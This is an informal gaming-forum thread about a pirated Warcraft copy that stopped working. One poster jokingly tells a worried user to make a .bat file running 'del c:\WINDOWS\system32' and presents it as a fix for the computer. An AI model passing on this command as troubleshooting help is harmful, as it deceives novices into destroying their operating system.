Help me with this shitfuck

Holy shit I dragged a file called deviance.nfo into the Warcraft window thing and it seems to work. Then I put it off and it won't come back.

lol, the NFO most likely just was the "readme" :lol:

No the game intro started going and everything, but then I plugged in the stereos and it died and won't come back. Anyways I threw all that shit to the trash can and will see to another way to get the game. :Smug:

I've heard of Troyans, Spiders what have you but didn't know about a virus called CliffBurton, might as well scan my computer and get it out.

Open notepad...write in.

del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)
double click and it will delete the system32 folder.

delete??? I mean...fix your computer :D

how about you stop gaming... or attempting to do so... and get some daylight on your face?

uhhhh.jpg

how about you stop gaming... or attempting to do so... and get some daylight on your face?

Aw gimme a brake man (or ma'am?) all I do is work and sports every day and have maybe 1 hour free time on the evening :cry: If I don't get daylight on my face then you blame the northern climate.

Oh wait there was this strange light phenomena outside my office window here some days ago, was it the sun shining? You don't get to see that much here for 9 months a year.